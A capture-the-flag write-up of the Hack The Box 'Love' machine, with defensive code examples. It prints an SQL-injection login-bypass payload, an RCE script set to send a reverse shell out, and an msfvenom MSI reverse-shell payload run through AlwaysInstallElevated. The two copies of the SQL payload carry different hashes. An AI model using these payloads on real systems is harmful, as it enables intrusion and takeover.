🕵 HTB-Writeup : LOVE

Recon

rustscan x nmap

└─$ rustscan -b 10000 -a 10.10.10.239 -- -T5 -A -sV -Pn 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.

PORT      STATE SERVICE      REASON  VERSION
80/tcp    open  http         syn-ack Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     syn-ack Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
445/tcp   open  microsoft-ds syn-ack Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?       syn-ack
|_    Host '10.10.16.11' is not allowed to connect to this MariaDB server
| mysql-info: 
|_  MySQL Error: Host '10.10.16.11' is not allowed to connect to this MariaDB server
5000/tcp  open  http         syn-ack Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown      syn-ack
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?   syn-ack
47001/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack Microsoft Windows RPC
49668/tcp open  msrpc        syn-ack Microsoft Windows RPC
49669/tcp open  msrpc        syn-ack Microsoft Windows RPC
49670/tcp open  msrpc        syn-ack Microsoft Windows RPC
Host script results:
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-09-05T13:06:02-07:00

The nmap scan gives us some information about the machine: it is a Windows 10 Pro workstation (build 19042) named LOVE, with SMB and WinRM (5985/5986) exposed alongside several HTTP services.

A MariaDB server listens on port 3306, but we cannot use it: the server only accepts connections from allowed hosts, and ours is refused. Ports 443 and 5000 serve HTTP as well but answer 403 Forbidden from our address.

└─$ mysql --host=10.10.10.239                              
ERROR 1130 (HY000): Host '10.10.16.11' is not allowed to connect to this MariaDB server

We have an HTTP server on port 80 (and on 443 and 5000). The http-title from the scan tells us the website is a "Voting System using PHP".

Browsing to http://10.10.10.239/index.php, we land on a login form.

[Screenshot: index page with the login form]

dirbuster

Using dirbuster we discover some directories and an interesting admin login page at http://10.10.10.239/admin/index.php.

Vulnerabilities

searchsploit

Running searchsploit, we find multiple public exploits for Voting System 1.0.

└─$ searchsploit voting system                             
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Voting System 1.0 - Authentication Bypass (SQLI)                                   | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)          | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated)                        | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)                | php/webapps/49817.txt
----------------------------------------------------------------------------------- ---------------------------------

First, we focus on the Authentication Bypass (SQLI) to get past the login form on the admin page.

Exploiting Voting System

First solution - SSRF

The nmap scan (run with -A) also pulls the TLS certificate served on port 443.

We can extract from it two domains:

  • love.htb
  • staging.love.htb
[Screenshot: subject name of the certificate containing the two domains]

# append both domains to /etc/hosts (">" would overwrite the file)
echo "10.10.10.239 love.htb staging.love.htb" | sudo tee -a /etc/hosts

Browsing to http://staging.love.htb we find a file scanner service, with a demo page that takes a URL pointing to the file to scan.

[Screenshot: URL file scanner]

Remember the services that rejected us from the outside (MariaDB on 3306, the 403 on ports 443 and 5000)? The scanner fetches the URL we give it from the server itself, so a URL pointing at http://127.0.0.1 is a request coming from localhost, not from our IP, and those filters no longer apply. This is a Server-Side Request Forgery (SSRF).

[Screenshot: exploiting SSRF on the scanner service]

We get our credentials: admin:@LoveIsInTheAir!!!!
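The scanner forwards whatever URL it is given; the fix is to validate the fetch target before requesting it. The following is an added example (my own code, not the scanner's or Voting System's) of such a check: it accepts only http(s), resolves the host and refuses any address that is loopback, private, link-local or otherwise not globally routable. The FAKE_DNS table and fake_resolve are constructed so the demo runs offline; hostnames other than the ones on this page are hypothetical.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example, not code from the Voting System or the staging scanner.
ALLOWED_SCHEMES = {"http", "https"}

# Constructed lookup table standing in for DNS so the demo runs offline.
# "2130706433" is the decimal form of 127.0.0.1, which getaddrinfo()
# happily turns into the loopback address.
FAKE_DNS = {
    "localhost": {"127.0.0.1", "::1"},
    "staging.love.htb": {"10.10.10.239"},
    "metadata.internal": {"169.254.169.254"},  # hypothetical name
    "example.com": {"93.184.216.34"},
    "2130706433": {"127.0.0.1"},
}


def fake_resolve(host):
    """Offline stand-in for default_resolve()."""
    if host not in FAKE_DNS:
        raise socket.gaierror(f"unknown host {host!r}")
    return FAKE_DNS[host]


def default_resolve(host):
    """Every address the name maps to (A and AAAA), not just the first."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_routable(addr):
    """True only for globally routable unicast addresses."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped          # ::ffff:127.0.0.1 -> 127.0.0.1
    return addr.is_global and not (
        addr.is_loopback or addr.is_private or addr.is_link_local
        or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def is_safe_fetch_target(url, resolve=default_resolve):
    """Return (ok, reason) for a URL the server is asked to fetch."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    try:                                  # literal IP (v4 or bracketed v6)?
        addrs = {ipaddress.ip_address(host)}
    except ValueError:                    # hostname: check every address
        try:
            addrs = {ipaddress.ip_address(a) for a in resolve(host)}
        except (OSError, ValueError) as exc:
            return False, f"cannot resolve {host!r}: {exc}"
    for addr in addrs:
        if not is_routable(addr):
            return False, f"{host!r} -> {addr} is not globally routable"
    return True, "ok"
```

Run the check again on every redirect hop (HTTP clients follow redirects by default, so fetch with redirects disabled and validate each Location yourself), and connect to the address you validated rather than resolving the name a second time, otherwise a DNS rebinding race can slip past the check.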

Second solution - SQL injection

This exploit uses a UNION-based SQLi to bypass authentication.

The login query looks the admin up by username, then checks the submitted password against the hash stored in the row it gets back. We therefore supply a username that does not exist, so the only row returned is the one our UNION SELECT appends, and we put a bcrypt hash of a password we know (here "admin") in the position of the password column:

login=&password=admin&username=coucou' UNION SELECT 1,2,"$2y$10$913MFiqWEjfzJ0fZc74hQeRdPGOdggX7KFbd23rfPyf5zmnISBC3a",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -

With Burp, I craft the request with this payload (URL-encoded) and send it:

POST /admin/login.php HTTP/1.1
Host: 10.10.10.239
Content-Length: 194
Cache-Control: max-age=
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.239
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.239/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=sv9dcm0k1bv1gl1q2nhq5db1e0
Connection: close

username=coucou%27+UNION+SELECT+1%2C2%2C%22%242y%2412%24jRwyQyXnktvFrlryHNEhXOeKQYX7%2F5VK2ZdfB9f%2FGcJLuPahJWZ9K%22%2C4%2C5%2C6%2C7+from+INFORMATION_SCHEMA.SCHEMATA%3B--+-&password=admin&login=

It works! We are now connected to the Dashboard as Neovic Devierte (admin).
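To see why the UNION row is enough to log in, here is an added example (my own code, not the Voting System's) that models the admin login with an in-memory SQLite table, beside the parameterised query that stops it. bcrypt is not in the standard library, so a SHA-256 stand-in plays password_hash/password_verify; the column layout (password in the third column) is assumed from the position of the hash in the payload, and the stored admin password is the one recovered above.

```python
import hashlib
import sqlite3

# Added example, not the Voting System's own code.


def hash_password(password):
    """Stand-in for PHP password_hash(); not bcrypt."""
    return hashlib.sha256(password.encode()).hexdigest()


def verify_password(password, stored_hash):
    """Stand-in for PHP password_verify()."""
    return hashlib.sha256(password.encode()).hexdigest() == stored_hash


def build_db():
    """Admin table with the 7 columns the payload implies; column names
    other than `username`/`password` are assumed."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE admin (id INTEGER, username TEXT, password TEXT, "
        "firstname TEXT, lastname TEXT, photo TEXT, created_on TEXT)")
    # Constructed row: the real hash on the box is unknown to us here.
    con.execute("INSERT INTO admin VALUES (?,?,?,?,?,?,?)",
                (1, "admin", hash_password("@LoveIsInTheAir!!!!"),
                 "Neovic", "Devierte", "", "2021-01-01"))
    con.commit()
    return con


def vulnerable_login(con, username, password):
    """String-concatenated query: whatever row the attacker's UNION
    returns is treated as the admin record. Returns the username on
    success, None otherwise."""
    query = f"SELECT * FROM admin WHERE username = '{username}'"
    row = con.execute(query).fetchone()
    if row is None:
        return None
    return row[1] if verify_password(password, row[2]) else None


def safe_login(con, username, password):
    """Parameterised query: the payload is compared as a literal username."""
    row = con.execute("SELECT * FROM admin WHERE username = ?",
                      (username,)).fetchone()
    if row is None:
        return None
    return row[1] if verify_password(password, row[2]) else None


def auth_bypass_payload(known_password):
    """Non-existent username + UNION row carrying a hash we control.
    The page's payload adds `from INFORMATION_SCHEMA.SCHEMATA` and a `;`,
    which MariaDB accepts; SQLite needs neither, so they are dropped."""
    return ("coucou' UNION SELECT 1,2,'" + hash_password(known_password)
            + "',4,5,6,7 -- -")
```

The parameterised version is the whole fix: the quote in the payload can no longer terminate the string, so the database looks for a user literally named coucou' UNION SELECT ... and finds none.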

[Screenshot: Voting System dashboard]

Get our first shell

Now that we are logged in, we can use the File Upload RCE (Authenticated Remote Code Execution) exploit found with searchsploit.

The exploit is a Python script. It logs in, then uploads a PHP script through the voter profile photo upload feature; the application keeps the file's name and extension under /images, so it is reachable as http://10.10.10.239/images/shell.php and executed by PHP. Calling that URL spawns a reverse shell to our listener.

We edit the settings at the top of the script to fit our needs.

# --- Edit your settings here ----
IP = "10.10.10.239" # Website's URL
USERNAME = "admin" # Auth User
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.16.11" # Reverse shell IP
REV_PORT = "4444" # Reverse port
# --------------------------------

INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"

After starting a listener with nc (rlwrap for line editing), I run the exploit and catch the shell:

└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.239] 54012
b374k shell : connected

Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

C:\xampp\htdocs\omrs\images>type C:\Users\Phoebe\Desktop\user.txt
*************************7feb616

We get a shell as love\phoebe and can read the user flag.
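The upload works because the photo handler keeps the client's filename and extension and writes the file under the web root, where PHP executes it. As an added example (my own code, not the Voting System's), the following is the validation a hardened photo upload would do: the type comes from magic bytes rather than the filename or Content-Type, the stored name is random with an extension we choose, and a polyglot image carrying PHP code is refused. The size limit and the names are hypothetical.

```python
import secrets

# Added example, not code from the Voting System 1.0 application.
IMAGE_MAGIC = {              # magic bytes -> extension we will store
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
MAX_BYTES = 2 * 1024 * 1024  # hypothetical limit
PHP_MARKERS = (b"<?php", b"<?=", b"<script language=\"php\"")


def detect_image_type(data):
    """Extension derived from content, ignoring filename and Content-Type."""
    for magic, ext in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def validate_photo_upload(client_filename, content_type, data):
    """Return (ok, stored_name_or_reason).

    client_filename and content_type are used only in messages; the
    decision never depends on them, which is what makes 'shell.php'
    sent as image/jpeg harmless here."""
    if not data or len(data) > MAX_BYTES:
        return False, f"bad size for {client_filename!r}"
    ext = detect_image_type(data)
    if ext is None:
        return False, f"{client_filename!r} ({content_type}) is not an image"
    if any(marker in data for marker in PHP_MARKERS):
        return False, f"{client_filename!r} carries PHP code"  # polyglot
    # Random name, extension fixed by us: never *.php and never a path the
    # client chose, so nothing like /images/shell.php can be created.
    return True, f"{secrets.token_hex(16)}.{ext}"
```

Even with this check, store uploads outside the web root or in a directory where the PHP handler is disabled; with XAMPP's default configuration anything under C:\xampp\htdocs that ends in .php is executed.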

Path to the privesc

Local recon

Look for listening ports, running processes and the privileges of our user.

# show used ports
C:\xampp\htdocs\omrs\images> netstat -ano | findstr TCP
# search for tasks
C:\xampp\htdocs\omrs\images> tasklist /v 
# show privileges
C:\xampp\htdocs\omrs\images>whoami /all

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

But I don't find anything interesting.

WinPeas

I run WinPEAS and it reports that the AlwaysInstallElevated policy is set in both HKLM and HKCU. With both keys set to 1, Windows Installer runs any MSI package with SYSTEM privileges, whoever starts the installation. Both keys are needed; if only one is set, the policy is not in effect.

---------- Checking AlwaysInstallElevated
-  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
    AlwaysInstallElevated set to 1 in HKLM!
    AlwaysInstallElevated set to 1 in HKCU!

Abusing privileges

We can craft an MSI package with msfvenom that carries a reverse shell, upload it to the target, then install it with msiexec. Because of the policy, the installer, and with it our payload, runs as NT AUTHORITY\SYSTEM.

└─$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.16.11 lport=4445 -f msi > exploit.msi

# upload exploit.msi to C:\Windows\Temp on the target, then install it silently
C:\xampp\htdocs\omrs\images>msiexec /quiet /qn /i C:\Windows\Temp\exploit.msi

└─$ nc -lnvp 4445
listening on [any] 4445 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.239] 54112
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>

C:\Users\Administrator\Desktop>type root.txt
type root.txt
**************************43d68b

We are now SYSTEM and can read the root flag.

Tags

Easy, Internal, Apache, Penetration Tester Level 1, SSRF Exploitation, A05:2021-Security Misconfiguration, Public Vulnerabilities, MySQL, Unrestricted File Upload, Windows Vulnerabilities, Remote Code Execution, Confidentiality, Code Execution, Defense Mechanisms